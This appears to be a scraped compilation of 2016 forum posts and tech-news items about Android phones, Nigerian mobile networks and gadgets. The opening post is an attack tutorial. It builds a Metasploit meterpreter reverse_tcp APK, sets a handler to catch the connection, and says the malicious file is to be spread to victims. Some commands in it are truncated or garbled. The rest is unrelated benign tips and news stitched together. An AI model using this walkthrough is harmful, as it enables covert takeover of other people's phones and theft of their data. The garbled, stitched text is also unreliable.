Nowadays mobile users are increasing day
by day, the security threat is also increasing
together with the growth of its users. Our
tutorial for today is how to Hacking Android
Smartphone Tutorial using Metasploit. Why
we choose android phone for this tutorial?
simply because lately android phone
growing very fast worldwide. Here in China
you can get android phone for only US$ 30
it's one of the reason why android growing
What is android? according to wikipedia:
Android is an operating system based on
the Linux kernel, and designed primarily for
touchscreen mobile devices such as
smartphones and tablet computers. Initially
developed by Android, Inc., which Google
backed financially and later bought in 2005,
Android was unveiled in 2007 along with
the founding of the Open Handset Alliance:
a consortium of hardware, software, and
telecommunication companies devoted to
advancing open standards for mobile
andwhat is APK? according to wikipedia:
Android application package file (APK) is the
file format used  to distribute and install
application software and middleware onto
Google's Android operating system; very
similar to an MSI package in Windows or a
Deb package in Debian-based operating
systems like Ubuntu.
Here is some initial information for this

Attacker port to receive connection: 443
1. Metasploit framework (we use kali
Linux /1.0.6 in this tutorial)
2. Android smartphone (we use HTC One
android 4.4 KitKat)
Step by Step Hacking Android Smartphone
Tutorial using Metasploit:
1. Open terminal (CTRL   ALT   T) view tutorial
how to create  linux keyboard shortcut.
2. We will utilize Metasploit payload
framework to create exploit for this tutorial.
msfpayload android/meterpreter/

LPORT=<port_to_receive_con nection>
As described above that attacker IP address
is, below is our screenshot
when executed the command
3. Because our payload is reverse_tcp
where attacker expect the victim to connect
back to attacker machine, attacker needs to
set up the handler to handle incoming
connections to the port already specified
above. Type msfconsole to go to Metasploit
use exploit/multi/handler –> we will use
Metasploit handler set payload android/
meterpreter/reverse_tcp –> make sure the
payload is the same with step 2
4. The next step we need to configure the
switch for the  Metasploit payload we
already specified instep 3.
set lhost –> attacker IP
address set lport 443 –> port to listen the
reverse connection exploit –> start to listen
incoming connection
5.Attacker already have the APK's file and
now he will start distribute it (I don't need
to describe how to distribute this file,
internet is the good place for distribution.
6.Short stories the victim (me myself)
download the malicious APK's file and install
it. After victim open the application, attacker

7.It's mean that attacker already inside the
victim android smartphone and he can do
everything with victim phone
1. Don't install APK's from the unknown
2. If you really want to install APK's from
unknown source, make sure you can view,
read and examine the source code.

Mobile Phone / 4 Android Hacks You Can Do Without Rooting Your Mobile
« on: August 22, 2016, 09:20:30 pm »
Many think that Android hacks can be done
only using the rooted devices. Here are the
Tech Hacks you can do with your Android
mobile .
Bypass your security (in a secure area)
Setting up a trusted location means that
your device won’t require a security code
when you use it in that place. Although
there is a risk in doing this in public places –
because you are making it easier to get into
your phone – it’s a cool hack to use at
The way it works varies according to your
device, but it involves going to your
security settings and setting up a secure
unlock method, such as a PIN code (if you
haven’t already).
Once this has been done, go toSmart Lock,
enter your pin number and then hitTrusted
places. Add a trusted location and you will
no longer need to enter a PIN code to
unlock your phone while you’re in that
Record voice calls
Do you fantasize about working for the NSA
or MI-5 and being tasked with recording
phone conversations without the other
person knowing? If so, shame on you, but if
you do want to record conversations for
any reason, you may as well do it properly
by using the right app. Many Android call
recorder apps require you to root your
phone, but there are several that don’t.
Automatic Call Recorder is a free, easy-to-
use app, which lets you set up voice
recording on your device. Your
manufacturer may have blocked call
recording on your phone, but Automatic Call
Recorder has several options to work
around these blocks.
Turn your navigation buttons into app
Using the old but ever-useful app Home2
Shortcut, you can assign various shortcuts
to your navigation buttons, letting you
access your favorite apps instantly from
any screen. For example, I’ve assigned File
Manager (which is extremely useful, but not
too sexy on my homescreen) to a double-
tap of the home button, while I can open
my camera from any screen by tapping the
home button then the back-navigation keys.
Click below for our guide on how to use this
app to instantly launch your phone camera
– or any app you like, for that matter.
Play Old Games with an Emulator
Revisit your old favorite games by
downloading an emulator. Having an N64 in
your pocket isn’t much more than a novelty
unless you invest in a physical controller for
it, but Gameboy games and SNES/NES games
run like a dream on Android.

Most of the
affordable and mid range android devices
market have good set of specifications
which include a powerful processor which
can handle heavy games or apps with
ease.Despite many drawbacks like the
camera or the screen we have the major
problem is the internal storage. Not all device
will have a bad camera or bad quality
screen but definitely the storage will be
either 4gb or 8gb.Since android has come a
long way in development most of the apps
we have are huge .Installed 2 or 3 heavy
games would fill up the space and you will
be forced to un-install some of the apps to
retain your favourite one.
If you are have a gingerbread device or ice
cream sandwich you actually have the
option to move apps to sdcard but with
kitkat google removed the option .Later
with lollipop google enabled the option
again to move apps to sd though with some
limitations. If you have android device and
you actually want to move or install your
apps on sdcard then follow the following
How to move or install apps to sdcard
(without rooting):
1.Moving apps on Gingerbread or Ice cream
sandwich device:For non rooted users
To know the version of your android
device then go to device setting and click
on about  device. In the about device you
can find the android version of your
device. If you own a gingerbread or ICS
device then you can actually move the apps
to sdcard.
Using Default settings:
1.Go to device setting and find the option
2.Click on apps and you will find three tabs
which include download, running and all.
3.In the downloads tab click on the app
which you want to move.
4.Now you will find the option to move app
to external storage.
5.Once the app is moved you free space will
But there are some limitations with this
method. You will be able to move only some
portion of the app. That is you can move
only apk part. The data part of the app will
remain on internal storage.
Using adb commands:
adb is android debugging bridge which can
be used to connect the device using some
commands. This is similar to that of
command prompt of windows.Using this
we are going to set the default application
install location to external sdcard instead of
internal storage.
Before using this make sure you have adb
installed on your computer.
Enable usb debuggingon your device:
Go to device settings and click on about
device.Tap on build number continuously till
you see the message you are now a
developer. Now go back to device setting
and you find a new option “developer
setting”.Click on it and search for usb
debugging and check on it.
Now connect the device to computer using
usb cable  and open the adb or minimal fast
boot file.
In the fastboot type the following
“Adb devices”
This command verifies if the device is
recognised by the debugging bridge.
Once your device is recognised type the
following commands:
For device with gingerbread use :
“adb shell pm getinstalllocation”
you will get the defaulat location as auto.
now type this command:
“adb shell pm setinstalllocation 2”
This command would set the default apps
installation location to external sdcard.
For the devices with kitkat use:
adb shell pm get-install-location”
you will get the defaulat location as auto.
now type this command:
“adb shell pm set-install-location 2”
This command would set the default apps
installation location to external sdcard.
2.If you have a kitkat or lollipop device
Non rooted users)
since google removed the ability to move
apps to sdcard from the device setting you
have to use an app to move apps. You can
actually flash a custom rom that support
this feature .There are various apps in the
playstore that can move apps to sdcard.Let
see some of the apps than can do this.
Move apps to sdcard using apps:
A.App mgr 3 (app 2 sd):
This app requires you to be on jellybean or
above to work .This app manager not only
moves apps to external sd but has many
other functions like freezing the app so that
it does not work,uninstalling apps,hiding
apps from the app drawer and also apps
sharing between device through
bluetooth. This is available in both paid and
free versions.Free version is limited and has
Download the app and open it.
1.Swipe from the left you will different
2.Choose move apps to external sdcard.
3.It shows you what apps can be moved to
4.Move the apps that you want to reside
them on sdcard.
In order to increase internal storage move
all your images and videos to external
sdcard. Also set the default path of storage
of images in camera to sdcard instead of
internal storage.
The problem of using this app is that you
will not be able to  move the data of large
games that is obb files. It moves only apk to
sdcard. If you want to move obb that you
must have root access.
Move apps to sdcard for rooted users:
Rooted users always have an advantage to
play with mods or doing tricks on their
device .If you have rooted your device
there are many ways you can actually move
apps to sdcard including the large obb file.
Move apps using link 2 sdcard app:
Link to sd is app manager app which can be
used to move all your apps to
sdcardincluding the library files and obb
files. When ever you download a heavy
game it actually comes in two parts apk and
data or obb.Obb is the data of the games
which includes the assests of game.If you
try to move the game using the above
method you just move the apk file and obb
retains on internal storage.
Link to sd requires root permissions and
works with all android 2.2  devices
including lollipop. If you take look the
features of this app you will be able to
move obb files, link the dex files of the
system apps to sdcard, you can even move
all the bloatware to sdcard and the good
part is that you can actually set the default
application installation location either to
internal sdcard or external sdcard.
How to use this app:
1.Download the app from the playstore and
open it.
2.Grant super user permission when
3.Click on the app which you want to move
and you will find an option to “move to sd”.
4.Click on it and the app will be moved to
Using xposed framework module
If you have rooted your phone then might
know what an xposed module is.This
xposed module allows you to modify the
framework on stock or custom rom to add
features. Xinternalsd is anxposed
modulethat actually lets you to install the
games or files directly to sdcard instead of
moving them after downloading.
Since the xposed framework is not yet
optimized to work for lollipop you can only
use this on kitkat or below android
1.Download the xposed frame work and
install it.
2.Click on framework and install update and
reboot the device.
3.Once the device reboots open the
framework and and click on download
4.Search forxinternalsdand install it.
5.Once the you install it.Go back and click on
modules and check onxinternal sd.
6.Reboot the device again and open the
module .Set the path to install as “/storage/
7.Go to playstore and search for the app
sdfix by nextapp
8.Install the app and run it and click on
reboot the device again and try to
download apps from playstore you will
notice the apps installed on sdcard.
Final conclusion:
These are some of the you canmove apps
to sdcard. These would work for both
rooted and non rooted users.Using xposed
frame work on miui may cause bootloop
issues .So if you are using miui rom or
xiaomi phone then before using xposed
modules make sure that it does not
bootloop or use any aosp roms.

Mobile Phone / 6 steps To Reduce Your Mobile Data Usage on Android
« on: August 22, 2016, 09:15:50 pm »
1. Turn on data compression on Chrome!
Most of you are probably Android
supporters. And hence, you are also likely
Chrome users. Did you know Google’s
popular browser has a feature that can
reduce data consumption significantly?
Google states this option should save you
about 50% in data. All without you even
feeling a difference. In fact, you may feel
some changes – browsing will get faster!
What Chrome’s data compression option
does is route all your web browsing
through Google’s servers. The Search Giant
then takes the website’s data, compresses it,
optimizes it for the smaller screen and
sends it back to your device.
All you have to do is open Chrome, tap on
the 3-dot menu button and selectSettings.
Click onData Saverand then toggle the
option in the top-right corner. You are
2. Restrict background data
Some apps just spend too much data, even
when the smartphone is not in use. It’s
actually one of the greatest features on
Android, as background data allows you to
keep everything updated and monitored
while you are off doing other things. The
deal here is that not every app needs to
stay active at all times.
Go intoSettings > Data Usageand select the
app you want to restrict data for. In the
stats you will see two types of data:
foreground and background. If you find
background data is too high and you don’t
need the app to stay active, simple toggle
the switch that is labeled as “Restrict app
background data”.
3. Update apps only via WiFi
This one is a bit of an obvious one for
many of us, but plenty of users out there
continue updating their applications over
cellular connections. This is OK if you choose
to do it, but how many times have you
noticed all your apps were auto-updated
without your consent, spending all them
preciousGBs? Hopefully not too often, but if
this is an issue, we can show you how to
stop it from happening again.
Just open the Google Play Store and tap on
the hamburger menu button (three
horizontal lines parallel to each other). Hit
the Settings option and then select the
“Auto-update apps” button. Hit “Auto-
update apps over WiFi only”.
4. Keep an eye on your account syncing
We love our active syncing and push
notifications, but having these also means
the phone has to keep checking servers for
any new content. You must also realize
many apps and services are set to keep
sync by default, and often we don’t even
use them!
This is why you should keep an eye on
your account syncing options. Just go
toSettings > Accounts. For the sake of
showcasing useless services, let’s just jump
into your Google accounts and select your
most used one. In my case, all toggles are
turned on, so I am syncing app data,
Calendar, Chrome, Contacts, Docs, Drive,
Gmail, Google Fit, Opinion Rewards, Photos,
Play Music, Google+, Keep, Slides and many
others. Now, I know for a fact I don’t use
about 20% of these, so I can turn them off
and save myself some precious data! Do the
same for other accounts, as well.
6. Avoid streaming content
As much as we hate it, it is the awesome
stuff that uses up  the most data. This
includes streaming videos and music, as
well as looking through high quality images
or GIF files. Try to avoid these at all costs if
you really want to take care of your
internet usage.
Now, we know a smartphone is worthless
without your media, but there are ways to
stay entertained responsibly. Users can opt
for storing music and videos locally. If you
absolutely must stream, make sure you
jump into the settings and set quality at
lower rates. Likewise, you can decrease
resolution in YouTube and other video
streaming apps.
7. Cache everything, Whenever you can!
Certain apps allow for storing data locally.
These include popular ones like Google Maps
and Google Play Music. Make sure you cache
as much content as you can while you are
on a WiFi network. Then you can go out and
enjoy your content without spending any
of your precious data.

Mobile Phone / How to Increase WiFi Speed on Android
« on: August 22, 2016, 09:11:55 pm »
There are many methods and trick to
increase WiFi speed of Android phone. You
can do some manual actions or can use
apps to directly speed up your Android Wifi.
Apps to Increase Android Wifi Speed
1. WiFi | Mobile Network Speed: This app
really work and definitely increase your
WiFi and mobile network speed.
Measure App Speed in Real Time.
– Find the best Public WiFi connection.
– Clean your Home WiFi channel.
– Compare WiFi vs. Cellular Net App Speed.
Choose the best network.

your data quota again.
These are all major features of this
2. Wifi Booster & Analyzer: It is a profession
WiFi Analyzing tool. It analyze your internet
and wifi connection and then helps you to
increase internet speed or boost wifi speed.
*.Display your wifi info and wifi signal
*.Provide Manual boosting mode with the
network analyzer to lead you to move your

*.Monitoring and analyze your network
speed in background to ensure you have
the fastest network speed.
With this network booster you can only
increase speed of Wifi not your mobile 2G
3G and 4G network.
How to test your Internet Download Speed
There are lots of ways to test your internet
download speed. There are plenty of speed
test websites that ping your ISP to estimate
your Internet speed. This websites basically
give you approximate value of your
downloading and uploading speed.
But according to my experience when i
tested these websites , my download speed
is far better. But when i tried to play some
videos on you tube. It is not even touching
the feet of that speed. So there is some
difference, in your downloading speed and
your surfing speed. So only testing your
downloading speed with speed test
websites will not give you clear picture
about your internet connection speed. You
must try to buffer 2-3 videos
simultaneously to test it.
1. : It is the best site to check
your internet downloading speed. You just
have to go to and then just
click onBEGIN TESTbutton to start testing.
And in few minutes it will show you a speed
graph and your downloading and
uploading speed. To test on Android Okla
Speed testAndroid app is also available.
And here is my speed test result. Which is
very bad. Yes i know MTS is very bad
internet service provider. You might not get
right result in a single test , so just do 2-3
test and take their average.
Well this is the reason why i am writing this
article. My internet speed was very slow but
then i tried some tricks to optimize my
internet speed and some of they really
worked. Now i am getting far better speed
then earlier. So i will suggest you to try
these methods to speed up internet.
How to Increase Internet Download Speed
in Android
As we all know that our internet speed is
totally depended on our Internet service
provider. But its not only depend on your
ISP only. There are many other factors that
limits your internet speed. Like if you and
your friend have same network , but
different device. Now if your friend getting
higher speed then you at the same location.
Then this is clear that there is some issues
with devices also. So here are some quick
tips to boost Android Internet speed.
The first thing that you need to do to
increase internet download speed in
Android is Go toSettings>> Wireless &
Networks. Then in Options you will findGPRS
transfer prefer. Here change the settings
todata preferinstead ofcall prefer. It will
increase your data transfer rate which will
speed up your internet downloading speed.
1.Clear Android Phone Cache: Generally
Android devices get slow due to less cache
memory. Your cache memory is limited and
its get full when you run different apps. So
you need to clear your cache regularly to
maintain your Android performance.
2.Running Unwanted apps: Some unwanted
apps keep on running at background and
utilize large part of our processor. So you
need to identify those apps and close them.
As such all in all Android devices you can
clear unwanted apps by holding Menu key.
And also uninstall the apps that you are not
using frequently to reduce burden on your
3.Right Browser Selection :browser selection
has greater effect on Internet speed on any
device. I will suggest you to use Opera Mini
or UC Browser. They are the best browser
and have high data transfer rate. Just try
opera mini and compare the speed with
your old browser. You will clearly see the
4.Use 3G(WCDMA) or 4G (LTE) networks: I am
not telling you to recharge for 3G or 4G. Just
switch to 3G or 4G networks even if you
have recharge of 2G. And also don’t forget
to Enable 3G in your phone. Just Go
toSettings >> Wireless & Networks.Enable 3G
here. Now even you have 2G internet pack
but you can get slightly increase in your
Internet speed.
5.Managing Permission to access Data for
apps: There are plenty of apps that keep on
using data in background without our
knowledge like Gmail , games etc. Due to this
there is decrease in speed and we lose our
data also. So you need to stop such apps to
access data.
You can use any third party apps to prevent
these apps to access data. Like you can use
Task manager application and block all
those apps that are wasting your data.
6.Increase Network Signal With Android
app: The main reason of slow internet is
less Network strength at you location. So
either complain about this to your ISP or
switch to better network. And you can also
use these Network booster apps.
Network Speed Booster
Signal Booster for Android
If these methods does not help you in
increasing your internet speed. Then you
can try these Internet booster apps for
android. Just search for internet booster on
play store. You will find many apps. Read
their review and select the best.
According to my experience, i found
increase of 15-25% in my downloading
spped after trying all these methods. So you
must also try, you will surely increase your
internet speed.

Mobile Phone / How to encrypt your android phone
« on: August 22, 2016, 09:10:24 pm »
Google introduced full-device encryption
back in Android Gingerbread (2.3.x), but it
has undergone some dramatic changes
since then. On some higher-end handsets
running Lollipop (5.x) and higher, it’s
enabled out-of-the-box, while on some
older or lower-end devices, you have to
turn it on yourself.
Why You Might Want to Encrypt Your Phone
Encryption stores your phone’s data in an
unreadable, seemingly scrambled form. (To
actually perform the low-level encryption
functions, Android uses dm-crypt, which is
the standard disk encryption system in the
Linux kernel. It’s the same technology used
by a variety of Linux distributions.) When
you enter your PIN, password,  or pattern
on the lock screen, your phone decrypts the
data, making it understandable. If someone
doesn’t know the encryption PIN or
password, they can’t access your data. (On
Android 5.1 and above, encryption
doesn’trequirea PIN or password, but it’s
highly recommended since not having one
would reduce the effectiveness of the
Encryption protects the sensitive data on
your phone. For example, corporations with
sensitive business data on company phones
will want to use encryption (with a secured
lock screen) to help protect that data from
corporate espionage. An attacker won’t be
able to access the data without the
encryption key, although there are more
advanced cracking methods that make it a
If you’re an average user, you may think
you don’t have sensitive data on your
phone, but you probably do. If your phone
is stolen, that thief now has access to your
email inbox, your home address, and any
number of other pieces of personal
information. Granted, most thieves would
also be deterred from accessing your data
by a standard unlock code—encrypted or
not. And, most thieves are more interested
in wiping and selling the phone than
accessing your personal data. But, it never
hurts to keep that stuff protected.
Things to Consider Before Enabling
Most newer Android phones ship with
encryption already turned on by default. If
this is the case for your phone, there is no
way to disable encryption. But if you’re
using a device that doesn’t have encryption
enabled out of the box, there are some
things to consider before enabling it:
*.Slower Performance:Once a device is
encrypted, the data has to be decrypted on-
the-fly every time you access it. Therefore,
you may see a bit of a performance drop
once it’s enabled, though it’s generally not
noticeable for most users (especially if you
have a powerful phone).
*.Encryption is one-way: If you enable
encryption yourself, the only way to undo
the process is by factory resetting the
device and starting over from scratch. So
make sure you’re sure before you start the
*.If you’re rooted, you’ll need to temporarily
unroot: If you try to encrypt a rooted
phone, you’ll run into problems. You can
encrypt your rooted phone, but you’ll have
to unroot it first, go through the encryption
process, then re-root afteward.
These aren’t meant to deter you from
encrypting your phone-—just to give you
an idea of what caveats it comes with. For
most people, we think the added protection
is well worth it.
How to Enable Encryption in Android
Before you get started, there are a few
things worth noting:
*.Encrypting the device can take an hour or
*.Your device’s battery must be at least 80%
charged. Android won’t even start the
process otherwise.
*.Your device must be plugged in
throughout the entire process.
*.Again, if you’re rooted, be sure to unroot
your phone before continuing!
Basically, make sure you’ve got plenty of
time and battery before you start the
process. If you interfere with the process or
end it before it’s finished, you will likely lose
all your data.Once the process is started, it’s
best to just leave the device alone and let it
do its thing.
With all the caveats out of the way, you’re
ready to encrypt your device.
Start by heading into the Settings menu and
tapping on “Security,” again keeping in
mind that the wording may be slightly
different. If your device is already
encrypted, it will show up here. Some
devices will also allow SD card contents to
be encrypted, but by default Android just
encrypts on-board storage.
If the device isn’t encrypted, you can start
the process by tapping the “Encrypt phone”
The next screen will present a warning to let
you know what to expect once the process
is finished, most of which we’ve already
talked about in this article. If you’re ready to
proceed, hit the “Encrypt phone” button.
The phone will then reboot and start the
encryption process. A progress bar and
estimated time till completion will show up,
which should at least provide an idea of
how long you’ll be without your beloved
handset. Just wait, it’ll all be okay soon. You
can do this. You’re strong.
Once it’s finished, the phone will reboot and
you’re back in business. If you set up a lock
screen password, PIN, or pattern, you’ll have
to put it in now so the device will finish the
boot process.
If you haven’t set up a PIN or password,
now is a good time to do so. Head into your
device’s Settings > Security menu. From
there, select the “Screen Lock” option (keep
in mind that the wording may be slightly
different for non-stock Android handsets,
like Samsung Galaxy devices).
Choose Pattern, PIN, or Password to set your
You’ll be asked if you want to require the
PIN, password, or pattern at startup. This is
up to you, but we recommend choosing
yes, since this increases the security of your
Note that even with a fingerprint reader,
you can’t use a fingerprint to unlock a
device on first boot—you’ll have to put in
the password, PIN, or pattern. After the
device has been decrypted with the correct
security unlocking method, the fingerprint
reader can be used to unlock the screen
moving forward.
From now on, your device will be
encrypted, but if you ever want to disable
it, you can do so by performing a factory
reset. If you have a newer device that has
encryption enabled out of the box, there’s
no way to remove said encryption—not
even with a factory reset.

We keep on seeing new innovations in the tech world on frequent basis.

Although wireless chargers are no more news as they have been available for a long time now but a company by name "OvRcharge" has come out with a different way of designing the chargers in their own unique way by including "Levitating" effects while the phone is charging.

(which is first of its kind)

Levitating wireless charger

Below is what the creators said about the charger the fundamental principles on how it works

“To achieve altitude and be able to charge wirelessly, the phone requires a special case that consists of two main parts, electricity receiver from the base and a Magnet to hold its position mid-air. So we design ultra thin case to not only protects your investment but to go some levels and also powers it up all at the same time. This case has a magnet that will help it to levitate & it also has an induction receiver for charging without cables.”

Meanwhile, apart from the Levitating effect, it works just like other wireless chargers out there in the market.

Is It Available Now?

Right now, it’s a kickstarter project that is still being worked on.

Will keep you updated as soon as it is made available.

Africa is set to welcome yet another brand of Samsung phones to the continent as Samsung plans to hit Africa with its "Tizen powered smartphones"

But what is meaning of Tizen phones? Tizen is an open source operating system based on the Linux kernel and WebKit runtime.

This simply means that users can obtain the source code that Tizen is based on, allowing smartphone owners to tinker with and alter a device's software.

A new report says the upcoming "Samsung Z2 will be launched in African countries" such as Nigeria, South Africa, and Kenya, including some Asian markets in India, Indonesia, Nepal, Sri Lanka, Bangladesh.

This launch is expected to take place sometime in October this year.

It is worthy to know that Z2 will be the first ever Tizen phone have support for 4G LTE in addition to remote assistance feature.

The report highlighted that countries like Nigeria and Kenya are undergoing infrastructural development to welcome 4G LTE technology to the areas so it will be easy for the South Korean company to capture the market there.

According to the Report Samsung also plans to utilize these African markets as test-beds for its "Tizen-based IoT infrastructure."

As we are stylishly moving over to the next planet of ultra fast 4G network in Nigeria, network providers have started adjusting to the new era as no one wants to remain in the dark.

Ntel stormed Nigeria few months ago with their 4G LTE services which is now in available in Lagos, Abuja and Nasarawa State

In the other hand, MTN announced its own 4G LTE networkservices but the question now is which of the two networks provides the fastest download and uploading speed with 4G connection?

Well, after running the test on both networks, i must confess that MTN is simply joking. What i saw as their download speed and upload speed made me think twice if they really know what they are doing.

Maybe it's just a joke but let's be serious here.

Ntel beat MTN by a very wide margin when it comes to speed. Just take a look at these "screenshots below for the 4G LTE network speed test:"

Ntel 4G LTE Speed Test Result

From the screenshots you can see that ntel network recorded 55.13Mbp sin download speed and 24.40Mbps in upload speed.

MTN 4G LTE Speed Test Result

MTN really disappointed. Sometimes i even think if this is actually a 4G or 3G service.

Yes i know that there are various categories of 4G network; even the lowest category, i think won't record this.

The download speed is 14.19Mbps while the upload speed is just 1.81Mbps (too poor i must say)

Let's just do as if we didn't see this and hope MTN do something fast about it or it could be a bad business for them in the long run. Nigerians want and deserve the best from these network operators.

Motorola, which is now owned by Lenovo, has announced the entry-level Mote E3 smartphone.

It brings much-needed hardware upgrades compared to its predecessor. Running on Android 6.0.1 Marshmallow, one of the key highlights of the smartphone is the 5-inch HD display, quad-core processor, smudge-resistant screen protector and slightly larger capacity battery.

Moto E3 Price

The Moto E3 is priced at $131 in the US (£99 in the UK), which roughly translates to Rs 8,900.

At this price point the smartphone will compete with the likes of the Samsung Galaxy On5 Pro, Lenovo Vibe K5 Plus, Intex Aqua View and Panasonic Eluga A2.

Interestingly, the Moto G4 Play which was recently launched in India is priced at Rs 8,999. Moto E-series has always been the entry-level smartphone priced around Rs 5,999, with Moto G series priced slightly upwards of Rs 10,000. It will be interesting to see how aggressive Motorola can get with the pricing when it launches the Moto E3 in India.

Moto E3 Specifications

The smartphone flaunts a slightly larger 5-inch IPS HD (720p) display, compared to 4.5-inch one on the Moto E (2015). It follows the same trend as the Moto G4 and Moto G4 Plus, which comes with a 5.5-inch display compared to 5-inch one on the predecessor, the Moto G (2015). Under the hood, the Moto E3 is powered by a quad-core processor.

However, there is no word on whether it is a Qualcomm or MediaTek chipset. Also, while details about the amount of RAM and onboard storage are missing, the smartphone does include a microSD card slot for further expansion.

Moto E3 features

Motorola has also worked on the camera chops giving the new Moto E3 the much-needed upgrade.

It now sports an 8-megapixel rear camera compared to 5-megapixel on the previous generation, and a 5-megapixel front-facing camera for selfies and video calling.

Armed with a 2,800mAh battery, connectivity options on the smartphone include Wi-Fi 802.11n, Bluetooth 4.0 LE, GPS and dual-SIM 4G LTE.

The Moto E3 also features a splash-proof body to protect it from accidental spills. This is one feature that had been there on the earlier Moto G and Moto E smartphones, but was missing from the latest Moto G4 and Moto G4 Plus.

Moto E3 availability

The smartphone is set to go on sale in the US sometime in September, TheVerge reports.

However, there is no word on when it will be available in India.

The African Union, AU, is working to produce a common electronic passport that will grant holders visa-free access to all 54 member-countries.
This was contained in a statement by the union on Wednesday.

AU said the passport was a step towards the fulfilment of the continent’s aspirations as enshrined in Agenda 2063 action plan, which is “to promote greater continental integration and forge a united Africa”.

AU disclosed that the passports will be distributed to all African citizens by 2018, a plan that will be discussed during a one-week summit scheduled to hold next week in Kigali, Rwanda.

Continuing the statement said, “Countries such as Seychelles, Mauritius, Rwanda and Ghana, have taken the lead in ensuring easier intra-Africa travel by relaxing visa restrictions and in some cases, lifting visa requirements altogether.

“The scene seems to be set to realise the dream of visa-free travel for African citizens within their own continent by 2020.

“Issuance of the AU e-Passport is expected to pave the way for member-states to adopt and ratify the necessary protocols and legislation, with a view to begin issuing the much expected African passport.”

Its quite a sad news crafting from the topic, have you heard? Have you heard that Whatsapp will no longer support Nokia, Java, Blackberry devices including BB10.
Its quite shocking to hear or to believe that whatsapp has terminated there interest on those antiquated listed/low end devices.

WhatsApp had earlier announced that they will end supports for Blackberry come 31st December 2016; but disaster stroke 3 days ago when WhatsApp roll-out aching reminder, reminding users that they’ll end supports come ending of the year.

Like play like play, an update was released and I updated my old Blackberry 10 device; only to discover that WhatsApp stopped working. Kept re-installing. I went to Blackberry store and discover that a lot of people who installed that updates have one complain or the other.

Even though Blackberry 10 devices do accept android application, meaning that you can install WhatsApp apk on your BB 10 but it doesn’t work like normal WhatsApp on Blackberry, doesn’t display notification integrated via the hub. It is just like using 2go on Nokia 3310.

Now I give up on Blackberry. I can categorically say that no more rising for Blackberry 10 devices.
Those of you still using it, find a nearby computer market and sell it. The tech visionaries didn’t see Blackberry featuring in the future.
